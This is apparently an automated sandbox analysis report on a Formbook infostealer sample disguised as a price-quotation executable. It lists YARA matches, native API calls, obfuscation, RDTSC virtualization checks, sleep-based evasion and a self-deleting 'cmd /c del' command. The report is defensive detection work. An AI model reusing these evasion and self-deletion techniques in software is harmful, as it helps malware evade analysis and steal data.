Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A
Detected potential crypto function
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00406354 0_2_00406354
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00404802 0_2_00404802
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00406B2B 0_2_00406B2B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333AA17 0_2_7333AA17
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_7333AA08 0_2_7333AA08
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00401027 3_2_00401027
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041C966 3_2_0041C966
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B931 3_2_0041B931
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00401208 3_2_00401208
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041BB7C 3_2_0041BB7C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041CBD9 3_2_0041CBD9
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00408C8B 3_2_00408C8B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00408C90 3_2_00408C90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041C5D1 3_2_0041C5D1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041A6B6 3_2_0041A6B6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009EB090 3_2_009EB090
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A91002 3_2_00A91002
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009DF900 3_2_009DF900
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_009F4120 3_2_009F4120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6B090 17_2_04C6B090
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D11002 17_2_04D11002
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6841F 17_2_04C6841F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C6D5E0 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04D21D55 17_2_04D21D55
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C5F900 17_2_04C5F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C50D20 17_2_04C50D20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C74120 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C76E30 17_2_04C76E30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C8EBB0 17_2_04C8EBB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B931 17_2_00B4B931
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4C966 17_2_00B4C966
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4CBD9 17_2_00B4CBD9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4BB7C 17_2_00B4BB7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B38C90 17_2_00B38C90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B38C8B 17_2_00B38C8B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B32D90 17_2_00B32D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4A6B6 17_2_00B4A6B6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B32FB0 17_2_00B32FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 04C5B150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004185D0 NtCreateFile, 3_2_004185D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00418680 NtReadFile, 3_2_00418680
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00418700 NtClose, 3_2_00418700
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004187B0 NtAllocateVirtualMemory, 3_2_004187B0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004185CB NtCreateFile, 3_2_004185CB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041867A NtReadFile, 3_2_0041867A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004186FB NtClose, 3_2_004186FB
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041872A NtClose, 3_2_0041872A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004187AA NtAllocateVirtualMemory, 3_2_004187AA
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A198F0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A19860
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19840 NtDelayExecution,LdrInitializeThunk, 3_2_00A19840
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A199A0 NtCreateSection,LdrInitializeThunk, 3_2_00A199A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A19910
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19A20 NtResumeThread,LdrInitializeThunk, 3_2_00A19A20
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A19A00
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19A50 NtCreateFile,LdrInitializeThunk, 3_2_00A19A50
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A195D0 NtClose,LdrInitializeThunk, 3_2_00A195D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19540 NtReadFile,LdrInitializeThunk, 3_2_00A19540
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A196E0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A19660
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A197A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A19780
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A19FE0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A19710
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A198A0 NtWriteVirtualMemory, 3_2_00A198A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19820 NtEnumerateKey, 3_2_00A19820
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A1B040 NtSuspendThread, 3_2_00A1B040
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A199D0 NtCreateProcessEx, 3_2_00A199D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A19950 NtQueueApcThread, 3_2_00A19950
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99840 NtDelayExecution,LdrInitializeThunk, 17_2_04C99840
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_04C99860
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C995D0 NtClose,LdrInitializeThunk, 17_2_04C995D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C999A0 NtCreateSection,LdrInitializeThunk, 17_2_04C999A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99540 NtReadFile,LdrInitializeThunk, 17_2_04C99540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_04C99910
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C996D0 NtCreateKey,LdrInitializeThunk, 17_2_04C996D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_04C996E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A50 NtCreateFile,LdrInitializeThunk, 17_2_04C99A50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99650 NtQueryValueKey,LdrInitializeThunk, 17_2_04C99650
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_04C99660
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99FE0 NtCreateMutant,LdrInitializeThunk, 17_2_04C99FE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99780 NtMapViewOfSection,LdrInitializeThunk, 17_2_04C99780
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99710 NtQueryInformationToken,LdrInitializeThunk, 17_2_04C99710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C998F0 NtReadVirtualMemory, 17_2_04C998F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C998A0 NtWriteVirtualMemory, 17_2_04C998A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9B040 NtSuspendThread, 17_2_04C9B040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99820 NtEnumerateKey, 17_2_04C99820
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C999D0 NtCreateProcessEx, 17_2_04C999D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C995F0 NtQueryInformationFile, 17_2_04C995F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99950 NtQueueApcThread, 17_2_04C99950
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99560 NtWriteFile, 17_2_04C99560
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99520 NtWaitForSingleObject, 17_2_04C99520
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9AD30 NtSetContextThread, 17_2_04C9AD30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A80 NtOpenDirectoryObject, 17_2_04C99A80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99670 NtQueryInformationProcess, 17_2_04C99670
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A00 NtProtectVirtualMemory, 17_2_04C99A00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99610 NtEnumerateValueKey, 17_2_04C99610
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A10 NtQuerySection, 17_2_04C99A10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99A20 NtResumeThread, 17_2_04C99A20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C997A0 NtUnmapViewOfSection, 17_2_04C997A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9A3B0 NtGetContextThread, 17_2_04C9A3B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99760 NtOpenProcess, 17_2_04C99760
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99770 NtSetInformationFile, 17_2_04C99770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9A770 NtOpenThread, 17_2_04C9A770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99B00 NtSetValueKey, 17_2_04C99B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C9A710 NtOpenProcessToken, 17_2_04C9A710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04C99730 NtQueryVirtualMemory, 17_2_04C99730
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B485D0 NtCreateFile, 17_2_00B485D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B48680 NtReadFile, 17_2_00B48680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B487B0 NtAllocateVirtualMemory, 17_2_00B487B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B48700 NtClose, 17_2_00B48700
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B485CB NtCreateFile, 17_2_00B485CB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B486FB NtClose, 17_2_00B486FB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4867A NtReadFile, 17_2_00B4867A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B487AA NtAllocateVirtualMemory, 17_2_00B487AA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4872A NtClose, 17_2_00B4872A
Sample file is different than original file name gathered from version info
Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.269417802.000000000EABF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341516961.0000000000C5F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe Virustotal: Detection: 34%
Source: PRICE_REQUEST_QUOTATION.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File read: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Jump to behavior
Source: PRICE_REQUEST_QUOTATION.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\nsn8CC7.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/2@9/5
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar, 0_2_00402053
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004042C1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source: Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Unpacked PE file: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B87C push eax; ret 3_2_0041B882
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B812 push eax; ret 3_2_0041B818
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B81B push eax; ret 3_2_0041B882
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041603B push eax; ret 3_2_0041603C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B148 pushad ; ret 3_2_0041B14B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004152B0 pushad ; retf 3_2_004152B8
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004105D2 push ebp; ret 3_2_004105D3
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004156A7 push ss; ret 3_2_004156AA
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_00A2D0D1 push ecx; ret 3_2_00A2D0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_04CAD0D1 push ecx; ret 17_2_04CAD0E4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4603B push eax; ret 17_2_00B4603C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B812 push eax; ret 17_2_00B4B818
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B81B push eax; ret 17_2_00B4B882
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B87C push eax; ret 17_2_00B4B882
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B148 pushad ; ret 17_2_00B4B14B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B452B0 pushad ; retf 17_2_00B452B8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B405D2 push ebp; ret 17_2_00B405D3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B456A7 push ss; ret 17_2_00B456AA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 17_2_00B4B7C5 push eax; ret 17_2_00B4B818

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe File created: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\wscript.exe Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\wscript.exe Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000B38614 second address: 0000000000B3861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000B389AE second address: 0000000000B389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 2244 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 5540 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
